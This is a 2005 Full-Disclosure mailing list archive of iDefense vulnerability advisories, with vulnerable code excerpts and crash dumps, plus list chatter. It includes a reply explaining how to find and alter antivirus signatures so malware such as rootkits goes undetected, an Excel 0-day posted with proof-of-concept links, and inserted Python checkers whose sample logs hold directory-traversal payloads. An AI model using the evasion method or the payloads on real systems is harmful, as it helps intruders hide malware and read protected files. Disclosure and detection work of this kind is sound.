http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


Re: [Full-disclosure] Inside AV engines?

2005-12-12 Thread [EMAIL PROTECTED]

I would like to have much time to explain you clearly how to but sorry I
will do quick cos I disconnect soon:

what do you need to do on the infected file is to split it in different
part with the same size, then you sort out the infected part and the one
not. you re-split those files again but in smaller size, you sort out
again the infected one and the one not , etc , you will find out quickly
the detected signature with a byte precision.

tip: a tool outta there does it really well, its name UKSpliter, its
place, google :)

nb: this method is useless when the av detects a MD5 checksum as
pestpatrol, you change any byte and this is no more detected then...

This is the ultimate way to trick all antivirus, in the old days, had
made the famous rootkit hackerdefender undetected by all of them, to
note sophos and kav harder to trick because they detects signatures,
which modded, will probably break your proggie..

cheers to undergroundkonnekt guys :)

Jeroen wrote:
> For penetration testing on Wintel system, I often use netcat.exe and stuff
> like pwdump. More and more I need to disable anti-virus services before
> running the tools to avoid alarms and auto-deletion of the applications. It
> works but it isn't an ideal situation since theoretically a network can be
> infected while the AV-services are down. Recompiling tools is an option
> since the source of many tools I use is available. The question is (before I
> burn useless CPU cycles): can someone help me getting info about the inside
> of AV engines? Will addition of some rubbish to the code do the trick (->
> other checksum), do I need to change some core code or is it a mission
> impossible anyway? Who can help for example getting some useful research
> papers on the subject of detecting viruses and how to bypass mechanisms
> used? Any help will be appreciated.
> 
> 
> Greets,
> 
> Jeroen
> 
> 


[Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro PC-Cillin Internet Security Insecure File Permission Vulnerability

2005-12-14 Thread [EMAIL PROTECTED]


Trend Micro PC-Cillin Internet Security Insecure File Permission Vulnerability


iDefense Security Advisory 12.14.05
www.idefense.com/application/poi/display?id=351&type=vulnerabilities
December 14, 2005

I. BACKGROUND

Trend Micro PC-Cillin Internet Security is antivirus protection software
for home and business use. It provides complete protection, detection
and elimination of thousands of computer viruses, worms, and Trojan
Horse programs.

II. DESCRIPTION

Local exploitation of an insecure permission vulnerability in multiple
Trend Micro Inc. products allows attackers to escalate privileges or
disable protection.

The vulnerabilities specifically exist in the default Access Control
List (ACL) settings that are applied during installation. When an
administrator installs an affected Trend Micro product, the default ACL
allows any user to modify the installed files. Due to the fact that some
of the programs run as system services, a user could replace an
installed Trend Micro product file with their own malicious code, and
the code would be executed with system privileges.

III. ANALYSIS

Successful exploitation allows local attackers to escalate privileges to
the system level. It is also possible to use this vulnerability to
simply disable protection by moving all of the executable files so that
they cannot start upon a reboot. Once disabled, the products are no
longer able to provide threat mitigation, thus opening the machine up to
attack.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Trend
Micro PC-Cillin Internet Security 2005 version 12.00 build 1244. It is
suspected that previous versions are also vulnerable. It has been
reported that InterScan VirusWall, InterScan eManager and Office Scan
are also vulnerable.

V. WORKAROUND

Apply proper Access Control List settings to the directory that the
affected Trend Micro product is installed in. The ACL rules should be set so
that no regular users can modify files in the directory.

VI. VENDOR RESPONSE

"Trend Micro has become aware of a vulnerability related to PC-CILLIN
12. PC-cillin12 does not work correctly when configuration file and the
registry are erased intentionally.

We will release PC-cillin12.4 in December 14, 2005 by AU server. This
release will be included short term solution of changing ACL to User
authority for configuration file and registry.

And

We will create a tool for changing ACL to User authority for
configuration file and registry.

This tool can be used for both PC-cillin12 and PC-cillin14 as a same
program."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3360 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/27/2005 Initial vendor notification
10/27/2005 Initial vendor response
12/14/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

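As an added illustration of the check the workaround above calls for (this is not code from the advisory or from Trend Micro): a Python audit of `icacls` output that flags ACEs granting write-class rights to low-privilege principals. The sample output and install directory are constructed, and the principal and rights tables are assumptions about what counts as "regular users" and "modify".

```python
"""Audit `icacls` output for ACEs that let ordinary users modify files."""
import re
from typing import List, Tuple

# Principals every interactive or network user is a member of (assumption:
# English group names; compared case-insensitively).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"builtin\users",
    r"builtin\guests",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
    r"nt authority\anonymous logon",
}

# icacls simple rights (F, M, W, D) and specific rights that allow a file to
# be replaced, appended to, deleted or re-permissioned.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DE", "DC", "WDAC", "WO"}

# Inheritance and qualifier tokens that grant nothing by themselves.
QUALIFIERS = {"OI", "CI", "IO", "NP", "I", "DENY"}

# Constructed sample of `icacls "<dir>"` output. The directory is a
# placeholder, not a real Trend Micro install path, and the ACL is invented
# to show the pattern the advisory describes: Users may modify the files.
SAMPLE_PATH = r"C:\Program Files\ExampleAV"
SAMPLE_ICACLS = r"""C:\Program Files\ExampleAV NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                           BUILTIN\Administrators:(OI)(CI)(F)
                           BUILTIN\Users:(OI)(CI)(M)
                           Everyone:(OI)(CI)(RX)
                           NT AUTHORITY\Authenticated Users:(OI)(CI)(RX,W)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_aces(icacls_output: str, path: str) -> List[Tuple[str, List[str]]]:
    """Return (principal, tokens) for each ACE. icacls prints one ACE per
    line, the first of them prefixed with the path that was queried."""
    aces = []
    for raw in icacls_output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        if ":(" not in line:
            continue  # blank line or the trailing summary line
        principal, _, rights = line.rpartition(":")
        tokens: List[str] = []
        for group in re.findall(r"\(([^)]*)\)", rights):   # "(OI)(CI)(RX,W)"
            tokens.extend(t.strip() for t in group.split(","))
        aces.append((principal, tokens))
    return aces


def find_weak_aces(icacls_output: str, path: str) -> List[Tuple[str, List[str]]]:
    """ACEs that grant a write-class right to a low-privilege principal."""
    weak = []
    for principal, tokens in parse_aces(icacls_output, path):
        if "DENY" in tokens:
            continue                      # a deny ACE grants nothing
        if principal.lower() not in LOW_PRIV_PRINCIPALS:
            continue
        granted = {t for t in tokens if t not in QUALIFIERS}
        if granted & WRITE_RIGHTS:
            weak.append((principal, sorted(granted)))
    return weak


if __name__ == "__main__":
    # Each hit is an ACE to remove (icacls <dir> /remove:g <principal>) or
    # to replace with a read/execute grant before any service restarts.
    for principal, rights in find_weak_aces(SAMPLE_ICACLS, SAMPLE_PATH):
        print(f"WEAK: {principal} may write ({','.join(rights)}) under {SAMPLE_PATH}")
```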


[Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro ServerProtect Crystal Reports ReportServer File Disclosure

2005-12-14 Thread [EMAIL PROTECTED]


Trend Micro ServerProtect Crystal Reports ReportServer File Disclosure

iDefense Security Advisory 12.14.05
www.idefense.com/application/poi/display?id=352&type=vulnerabilities
December 14, 2005

I. BACKGROUND

Trend Micro Inc.'s ServerProtect provides antivirus scanning with
centralized management of virus outbreaks, scanning, pattern file
updates, notifications and remote installations. More information about
the product set is available at:

www.trendmicro.com/en/products/file-server/sp/evaluate/overview.htm

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in Trend Micro
Inc.'s ServerProtect Management Console allows remote attackers to view
the contents of arbitrary files on the underlying system.

The problem specifically exists within the handling of the IMAGE
parameter in the script rptserver.asp. The vulnerable area of code is
outlined in the following snippet:

Set session("oEMF") = Server.CreateObject("CREmfgen.CREmfgen.2")
Call ParseQS()   ' IMAGE and DEL are populated from the request query string
if IMAGE <> "" then
    ' IMAGE is handed to StreamImage as a file name with no path validation
    Call session("oEMF").StreamImage(IMAGE, DEL)
    Response.End
end if

An attacker can utilize directory traversal modifiers to traverse
outside the system temporary directory and access any file on the same
volume.

III. ANALYSIS

Successful exploitation of the described vulnerability allows remote
attackers to view the contents of arbitrary files on the underlying
system. Exploitation does not require credentials thereby exacerbating
the impact of this vulnerability.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Trend
Micro ServerProtect for Windows Management Console 5.58 running with
Trend Micro Control Manager 2.5/3.0 and Trend Micro Damage Cleanup
Server 1.1. It is suspected that earlier versions and versions for other
platforms are vulnerable as well.

V. WORKAROUND

Employ firewalls, access control lists or other TCP/UDP restriction
mechanism to limit access to the vulnerable system on the configured
port, generally TCP port 80.

VI. VENDOR RESPONSE

"Trend Micro has become aware of a vulnerability related to Crystal
Report, a reporting component found in Trend Micro Control Manager (v2.5
and v3.0). Under certain conditions, arbitrary files on the
ReportServer volume inside Trend Micro Control Manager software could be
viewed or accessed remotely. Trend Micro is currently consulting with
Crystal Report regarding permanent solutions to this reporting
component. A temporary workaround solution can be recommended through
contacting Trend Micro customer and technical support."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-1930 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

06/03/2005 Initial vendor notification
06/06/2005 Initial vendor response
12/14/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

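Added example, not code from the advisory or from Trend Micro: a Python version of the containment check that rptserver.asp lacks for IMAGE, plus a scan of constructed web-server log lines for requests whose IMAGE value leaves the report directory. The base directory, the log field layout and the file names are assumptions.

```python
"""Containment check for the IMAGE parameter and a log scan for traversal."""
import re
from pathlib import Path, PureWindowsPath
from typing import List, Tuple
from urllib.parse import parse_qs, unquote


class UnsafePathError(ValueError):
    """Raised when an IMAGE value would leave the report directory."""


def resolve_image_path(base_dir: str, image_param: str) -> Path:
    """Map the untrusted IMAGE value onto a file under base_dir, or raise.

    The value is percent-decoded exactly once; NUL bytes, drive letters and
    absolute paths are rejected; then the joined path is canonicalised and
    checked for containment so '..' and symlinks cannot escape. The returned
    path, not the raw parameter, is what the file should be opened with.
    """
    name = unquote(image_param)
    if "\x00" in name:
        raise UnsafePathError("NUL byte in IMAGE")
    if PureWindowsPath(name).drive or name.startswith(("/", "\\")):
        raise UnsafePathError("absolute path in IMAGE")
    base = Path(base_dir).resolve()
    # A Windows server treats '\' and '/' alike, so normalise before joining.
    candidate = (base / name.replace("\\", "/")).resolve()
    if base not in candidate.parents:       # parents excludes candidate itself
        raise UnsafePathError(f"IMAGE escapes {base}")
    return candidate


def is_safe_image(base_dir: str, image_param: str) -> bool:
    try:
        resolve_image_path(base_dir, image_param)
        return True
    except UnsafePathError:
        return False


# Detection side: a '..' path segment in the decoded value, either separator.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def looks_like_traversal(value: str) -> bool:
    return (bool(TRAVERSAL.search(value))
            or bool(PureWindowsPath(value).drive)
            or value.startswith(("/", "\\")))


# Constructed W3C-style log lines (not from a real server):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2005-12-14 09:12:01 192.0.2.10 GET /rptserver.asp IMAGE=rpt1.emf&DEL=1 200
2005-12-14 09:12:05 192.0.2.77 GET /rptserver.asp IMAGE=..%5c..%5cwin.ini&DEL=0 200
2005-12-14 09:12:09 192.0.2.77 GET /rptserver.asp IMAGE=..%2f..%2f..%2fwindows%2fwin.ini 200
2005-12-14 09:13:00 192.0.2.10 GET /index.asp - 200
"""


def flag_traversal_requests(log_text: str) -> List[Tuple[str, str]]:
    """(client ip, decoded IMAGE) for rptserver.asp requests that escape."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7 or not fields[4].lower().endswith("/rptserver.asp"):
            continue
        query = parse_qs(fields[5], keep_blank_values=True)  # decodes once
        for value in query.get("IMAGE", []):
            if looks_like_traversal(value):
                hits.append((fields[2], value))
    return hits


if __name__ == "__main__":
    for ip, value in flag_traversal_requests(SAMPLE_LOG):
        print(f"{ip} requested IMAGE={value!r}")
```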


[Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro ServerProtect isaNVWRequest.dll Chunked Overflow

2005-12-14 Thread [EMAIL PROTECTED]


[Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro ServerProtect relay.dll Chunked Overflow Vulnerability

2005-12-14 Thread [EMAIL PROTECTED]


[Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro ServerProtect EarthAgent Remote DoS Vulnerability

2005-12-14 Thread [EMAIL PROTECTED]

Trend Micro ServerProtect EarthAgent Remote DoS Vulnerability

iDefense Security Advisory 12.14.05
www.idefense.com/application/poi/display?id=356&type=vulnerabilities
December 14, 2005

I. BACKGROUND

Trend Micro Inc.'s ServerProtect provides antivirus scanning with
centralized management of virus outbreaks, scanning, pattern file
updates, notifications and remote installations. More information about
the product set is available at:

www.trendmicro.com/en/products/file-server/sp/evaluate/overview.htm

II. DESCRIPTION

Remote exploitation of a denial of service vulnerability in Trend Micro
Inc.'s ServerProtect EarthAgent daemon allows attackers to cause the
target process to consume 100% of available CPU resources.

The problem specifically exists within ServerProtect EarthAgent in the
handling of maliciously crafted packets transmitted with the magic value
"\x21\x43\x65\x87" targeting TCP port 5005. A memory leak also occurs
with each received exploit packet allowing an attacker to exhaust all
available memory resources with repeated attack.

III. ANALYSIS

Successful exploitation of the described vulnerability allows
unauthenticated remote attackers to consume 100% CPU resources,
increasingly consume memory resources and potentially crash the
underlying operating system. Full CPU utilization can be achieved with a
single packet, memory consumption occurs incrementally on subsequent
attacks.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Trend
Micro ServerProtect for Windows Management Console 5.58 running with
Trend Micro Control Manager 2.5/3.0 and Trend Micro Damage Cleanup
Server 1.1. It is suspected that earlier versions and versions for other
platforms are vulnerable as well.

V. WORKAROUND

Employ firewalls, access control lists or other TCP/UDP restriction
mechanisms to limit access to vulnerable systems on TCP port 5005.

VI. VENDOR RESPONSE

The vendor has released the following security advisory for this issue:

http://kb.trendmicro.com/solutions/search/main/search/
solutionDetail.asp?solutionID=25254

"Contact Trend Micro Technical Support to request for the
SPNT5.58_HotfixB1137.zip file, which should only be installed on servers
running SPNT 5.58."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-1928 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

06/03/2005 Initial vendor notification
06/05/2005 Initial vendor response
12/14/2005 Public disclosure

IX. CREDIT

This vulnerability was discovered by Pedram Amini, OpenRCE
(www.openrce.org).

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.




Re: [Full-disclosure] Famous n3td3v quotes - The Director's Cut

2005-12-14 Thread [EMAIL PROTECTED]
I have nothing against you n3td3v , maybe are you talking too many to
finally say nothing...
but when ppl see this

http://forum.crime-research.org/teech-me-how-to-hack-vt6.html?highlight=

etc, you should change your nick , email or you will keep receiving such
blames here I guess...

my 2cent suggestion 2 you dude

ghost wrote:
> "MW, days2t, jasonv = three security professionals " was funnier than
> the actual log.
> 
> 
> On 12/14/05, Xyberpix <[EMAIL PROTECTED]> wrote:
>> http://www.threatlab.com/r-u-fed.html
>>



Re: [Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro ServerProtect relay.dll Chunked Overflow Vulnerability

2005-12-14 Thread [EMAIL PROTECTED]

Matt,

We don't disagree with you. The vulnerability lies in the Microsoft 
Foundation Classes (MFC) static libraries. Trend Micro also acknowledges 
this in their response. Unfortunately, Trend Micro's product 
distributions are vulnerable since they ship with the old static libraries.


Michael Sutton
Director, iDefense Labs



Re: [Full-disclosure] Famous n3td3v quotes - The Director's Cut

2005-12-14 Thread [EMAIL PROTECTED]
got it ;) later dude gone to bed..

n3td3v wrote:
> Hello,
> I sent you an offlist e-mail explaining the real reason behind that
> forum post, I hope you got it.
> Thanks,
> n3td3v
> 
> On 12/14/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> I have nothing against you n3td3v , maybe are you talking too many to
>> finally say nothing...
>> but when ppl see this
>>
>> http://forum.crime-research.org/teech-me-how-to-hack-vt6.html?highlight=
>>
>> etc, you should change your nick , email or you will keep receiving such
>> blames here I guess...



Re: [Full-disclosure] Moderated lists (NO)

2005-12-16 Thread [EMAIL PROTECTED]
FD can't be fully moderated because this will become bugtraq xss and sql
injection land hehe, with vulnerabilities posted with a big delay
between sending and publishing, sometimes it can take up to 3-4 days
to publish a vulnerability on bugtraq already pubbed on FD , so no way
to kill FD as bq is.

Aditya Deshmukh wrote:
>  
>> Why not do a self-regulating list?  Something along the lines 
>> of keeping
>> track of signup dates and IP addresses, then when a yahoo starts
>> spouting crap, put it to a vote on list. (only members older then xyz
>> date have a vote) If the list's wish is to have the user 
>> banned, then so
>> be it... 
>>
> 
> This is all so good in principle but how do you implement it ? And how
> Does voting take place ? By email to the list ? This way anytime we have 
> To remove someone from the list it will generate a whole lot of useless 
> mail
> 
> 



[Full-disclosure] iDefense Security Advisory 12.16.05: Citrix Program Neighborhood Name Heap Corruption Vulnerability

2005-12-16 Thread [EMAIL PROTECTED]

Citrix Program Neighborhood Name Heap Corruption Vulnerability

iDefense Security Advisory 12.16.05
www.idefense.com/application/poi/display?id=357&type=vulnerabilities
December 16, 2005

I. BACKGROUND

Citrix Program Neighborhood is the client used to connect to
applications published on Citrix Metaframe servers.

More information is available from the vendor website:

  http://www.citrix.com

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Citrix, Inc.'s
Program Neighborhood allows attackers to execute arbitrary code.

The vulnerability specifically exists due to insufficient handling of
corrupt Application Set responses. A heap-based buffer overflow will
occur when the Citrix Program Neighborhood client receives an
Application Set response containing a name value over 286 bytes. The
overflow will trigger an access violation in RtlFreeHeap() with
register control sufficient to write 4 bytes to an arbitrary location
as shown below:

77F52A7B  8B4E 0C MOV ECX,DWORD PTR DS:[ESI+C]
77F52A7E  898D 60FF  MOV DWORD PTR SS:[EBP-A0],ECX
77F52A84  8901   MOV DWORD PTR DS:[ECX],EAX

Registers:
EAX 41414141
ECX 4141
ESI 008D5E30 ASCII "AA"
EIP 77F52A84 ntdll.77F52A84

Crash:
77F52A84  8901   MOV DWORD PTR DS:[ECX],EAX

Remote attackers can send a specially crafted name value to overflow
the buffer and execute arbitrary code.

III. ANALYSIS

Successful exploitation of the vulnerability allows remote attackers to
execute arbitrary code with user privileges. The overflow is a
trivial heap-based buffer overflow due to insufficient bounds checking
on the 'name' value in Application Set responses. A typical
exploitation scenario would require an attacker to setup a fake Citrix
Server and wait for a Citrix Program Neighborhood client to connect.
Upon receiving the first connecting packets from the client, the server
would send a corrupt UDP packet to the client.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Citrix
Presentation Server Client 9.0. All prior versions are suspected
vulnerable.

V. WORKAROUND

iDefense is unaware of any effective workarounds at this time.

VI. VENDOR RESPONSE

The vendor has released the following advisory to address this issue:

http://support.citrix.com/kb/entry.jspa?externalID=CTX108354

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3652 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005 Initial vendor notification
11/15/2005 Initial vendor response
12/16/2005 Coordinated public disclosure

IX. CREDIT

iDefense credits Patrik Karlsson ([EMAIL PROTECTED]) with the discovery
of this vulnerability.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.



[Full-disclosure] 2x 0day Microsoft Windows Excel

2005-12-19 Thread [EMAIL PROTECTED]
Let's go on the fast publishing :)
I wont bother to message microsoft about this because they wont patch it
for sure according that they can't patch fully exploitable bugs in a
decent time, they do not patch IE dos
(http://heapoverflow.com/IEcrash.htm), so no way to bother them, we
should let them sleep a bit shhh ;)

Bug 1 and bug 2 are quite similar but NOT identical; both are null pointer
bugs. In bug 1 you should mod a graphic's pointer to point to a bad area,
and in bug 2 you should null out the size of the page name.


attached are the 2 pocs, nor here are direct links


http://heapoverflow.com/excelol/bug1.xls
http://heapoverflow.com/excelol/bug2.xls



Credits:

AD [at] heapoverflow.com



---

class101

Re: [Full-disclosure] 2x 0day Microsoft Windows Excel

2005-12-19 Thread [EMAIL PROTECTED]
I have said so this is only null pointer bugs but the way I trigger the
bug might be modded for a remote code execution who know , I'm not a
guru and maybe did an error triggering the flaw who knows :) but I bet
many are already researching on this hehe, happy job!



[Full-disclosure] iDefense Security Advisory 12.20.05: McAfee Security Center MCINSCTL.DLL ActiveX Control File Overwrite

2005-12-20 Thread [EMAIL PROTECTED]

McAfee Security Center MCINSCTL.DLL ActiveX Control File Overwrite

iDefense Security Advisory 12.20.05
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=358
December 20, 2005

I. BACKGROUND

McAfee VirusScan is an anti-virus software. More information is
available from the vendor website:

http://www.mcafee.com/myapps/

II. DESCRIPTION

Remote exploitation of an access control vulnerability in McAfee
Security Center allows attackers to create or overwrite arbitrary
files.

The vulnerability specifically exists due to a registered ActiveX
control failing to restrict which domains may load the control for
execution. MCINSCTL.DLL as included with McAfee Security Center exports
an object for logging called MCINSTALL.McLog. The McLog object is
designed to allow Security Center to log to a file through the StartLog
and AddLog methods. McAfee fails to restrict the ActiveX control from
being loaded in arbitrary domains. As such, attackers can create a
specially crafted web page utilizing the McLog object to create
arbitrary files. This attack can lead to arbitrary code execution by a
remote attacker.

III. ANALYSIS

Successful exploitation of this vulnerability allows attackers to
create or append to arbitrary files. An attacker can write to a startup
folder to execute arbitrary code during the next reboot or logon
session. A user will not be required to authorize the object
instantiation since the object is within a signed ActiveX control. A
typical exploitation scenario would require an attacker to convince a
targeted user to visit a malicious website.

This vulnerability hints at a new class of vulnerabilities that occur
due to developers not using the IObjectSafetySiteLock() API to restrict
domains that can load a particular ActiveX control. Vendors who
distributed third-party ActiveX controls should be sure to use the
IObjectSafetySiteLock() API in their applications.

IV. DETECTION

McAfee Security Center is a component that is distributed with various
McAfee products. The following products have been confirmed to contain
a vulnerable mcinsctl.dll component in their distribution:

• McAfee VirusScan (mcinsctl.dll 4.0.0.83)

V. WORKAROUND

iDefense is unaware of any effective workarounds at this time.

VI. VENDOR RESPONSE

"McAfee previously released updates to SecurityCenter that resolve this
issue. All active McAfee SecurityCenter users, by default, should have
automatically received the update, and will now have the fix for this
vulnerability already installed on their computers.

To manually check for updates, users can right-click the McAfee system
tray icon (white M on red background) and select 'Updates'. In the
resulting dialogue box, they should click 'Check Now' to check the
server for updates. The user will be walked through the update process
or be notified that all software is up to date. If a user has not yet
registered, a registration web page or the registration wizard will
pop-up, guiding the user through the update process.

McAfee's key priority is the security of our customers. In the event
that a vulnerability is found within any of McAfee's software, we have a
strong process in place to work closely with the relevant security
research group to ensure the rapid and effective development of a fix
and communication plan."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3657 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005 Initial vendor notification
11/16/2005 Initial vendor response
12/20/2005 Coordinated public disclosure

IX. CREDIT

iDefense credits Peter Vreugdenhil with the discovery of this
vulnerability.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.




[Full-disclosure] iDefense Security Advisory 12.20.05: Qualcomm WorldMail IMAP Server String Literal Processing Overflow Vulnerability

2005-12-20 Thread [EMAIL PROTECTED]
Qualcomm WorldMail IMAP Server String Literal Processing Overflow 
Vulnerability


iDefense Security Advisory 12.20.05
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359
December 20, 2005

I. BACKGROUND

Qualcomm WorldMail is an email and messaging server designed for use
in small to large enterprises that supports IMAP, POP3, SMTP, and web
mail features.

More information can be found on the vendors site:

 http://www.eudora.com/worldmail/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Qualcomm
WorldMail IMAP Server allows unauthenticated attackers to execute
arbitrary code.

III. ANALYSIS

Successful exploitation of this vulnerability allows attackers to
execute arbitrary code with SYSTEM privileges. This leads to a total
compromise of the mail server.

In order to trigger this overflow, an attacker only needs to send a long
string ending with a '}' character. This will result in a stack overflow
and the attacker may use an SEH overwrite or a standard EBP or EIP
overwrite in order to gain control of the process trivially.

This is a pre-authentication vulnerability. To exploit this
vulnerability an attacker would need to be able to connect to the e-mail
server and the IMAP module would have to be enabled (default). Only one
command is required to trigger this vulnerability.

IV. DETECTION

This exploit was tested against Qualcomm Worldmail server version 3.0.
Other versions may be vulnerable.

V. WORKAROUND

There is no workaround currently available except for disabling IMAP
services.

VI. VENDOR RESPONSE

The vendor was contacted according to the timeline shown but a response
has not yet been received. As this vulnerability has been publicly
disclosed at an alternate location
(http://seclists.org/lists/fulldisclosure/2005/Dec/1037.html) we are
proceeding with public disclosure.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-4267 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/15/2005  Initial vendor notification
12/20/2005  Coordinated public disclosure

IX. CREDIT

[EMAIL PROTECTED], an anonymous researcher and Nico are credited with
the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] iDefense Security Advisory 12.21.05: Macromedia JRun 4 Web Server URL Parsing Buffer Overflow Vulnerability

2005-12-21 Thread [EMAIL PROTECTED]

Macromedia JRun 4 Web Server URL Parsing Buffer Overflow Vulnerability

iDefense Security Advisory 12.21.05
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=360
December 21, 2005

I. BACKGROUND

Macromedia JRun 4 is an application server used for developing and
deploying Java based applications. More information can be found at
the following URL:

 http://www.macromedia.com/software/jrun/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Adobe Inc.'s
JRun 4 may allow attackers to execute arbitrary code or cause a denial
of service condition.

The vulnerability exists within the JRun web server, specifically in the
handling of long request strings. In certain configurations, when a long
(approximately 64k) URL is supplied, a stack-based overflow occurs
potentially allowing the execution of arbitrary code. In testing
performed by iDefense Labs, it was possible to overwrite the saved
return address on the stack with remotely supplied values (converted
into 'wide characters' by the server).

III. ANALYSIS

Successful exploitation may allow remote attackers to execute arbitrary
code with Local System privileges. The supplied JRun web server must be
active for the attack vector to exist. It is not recommended to use the
JRun web server component in production systems, as the installer
mentions that it should be used for development only.

As the service restarts after each crash, it is possible to make
multiple attempts to exploit this issue, and each time restart from a
'clean' state.

Although this vulnerability allows a stack overwrite, it may be more
difficult to exploit because the server converts the input string into
a 'wide character' version, placing a null byte between each character.
While this does not necessarily prevent exploitation, it does increase
the complexity of developing an exploit.

Exploitation of this vulnerability may allow a remote attacker to
execute code on the affected system as Local System, allowing complete
compromise, or cause a denial of service against the affected system,
preventing legitimate use.

IV. DETECTION

This vulnerability was confirmed by the vendor to affect the JRun 4
web server prior to the JRun 4 Updater 5 release in March of 2005.

V. WORKAROUND

The JRun documentation suggests that the JRun Web Server should not be
used in a production environment. In a development environment, the
JRun server should not accept connections from outside of the
development network.

VI. VENDOR RESPONSE

Adobe has reported that this issue was resolved in the JRun 4 Updater 5
release in March 2005.

The following security advisory was released on December 15, 2005:

http://www.macromedia.com/devnet/security/security_zone/mpsb05-13.html

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

